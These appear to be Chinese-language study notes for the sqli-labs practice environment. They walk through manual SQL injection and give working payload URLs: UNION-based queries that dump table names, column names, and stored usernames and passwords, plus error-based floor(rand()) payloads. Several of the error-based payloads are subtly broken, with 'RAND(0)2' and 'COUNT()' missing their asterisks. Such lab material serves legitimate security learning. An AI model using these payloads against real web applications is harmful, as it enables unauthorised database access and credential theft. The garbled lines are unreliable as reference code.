1、测试交互方法,判断浏览器提交数据和web服务器的交互方式
Get提交——提交的数据在URL中显示
POST提交——提交的数据不在URL中显示
2、判断提交变量的字符类型
整型——id=1 and 1=2 //让提交数据为假,有交互数据显示则为整型,否则为str(字符串);
字符串——id=1 and 1=2 无交互显示,则进一步判断闭合方式
常见的闭合方法 ‘’ “” () (‘’) (“ ”) 等。–+注释 PS: ’)语句–+
3、构造闭合(整型不需要),在闭合中写入SQL语句并判断数据库表的行数
在有显示的行输入需要回显的SQL语句
4、判断显示位
5、找库名–表名–列名–数据
举例:
http://192.168.230.135/sqli-labs-master/Less-3/?id=-1')%20union%20all%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20TABLE_schema%20=%20%27security%27%20–+
http://192.168.230.135/sqli-labs-master/Less-3/?id=-1')%20union%20all%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20TABLE_name%20=%20%27users%27%20and%20table_schema%20=%27security%27%20–+
http://192.168.230.135/sqli-labs-master/Less-3/?id=-1')%20union%20all%20select%201,group_concat(username),group_concat(password)%20from%20users%20–+
举例
http://192.168.230.135/sqli-labs-master/Less-5/?id=1
http://192.168.230.135/sqli-labs-master/Less-5/?id=1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20–
http://192.168.230.135/sqli-labs-master/Less-5/?id=1' AND(SELECT%201%20FROM%20(SELECT%20COUNT(),CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20–+
http://192.168.230.135/sqli-labs-master/Less-5/?id=1' AND (SELECT%201%20FROM%20(SELECT%20COUNT(),CONCAT((SELECT(SELECT%20CONCAT(CAST(column_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=0x656d61696c73%20AND%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20–+
http://192.168.230.135/sqli-labs-master/Less-5/?id=1' AND (SELECT%201%20FROM%20(SELECT%20COUNT(),CONCAT((SELECT(SELECT%20CONCAT(CAST(CONCAT(id)%20AS%20CHAR),0x7e))%20FROM%20security.emails%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20–+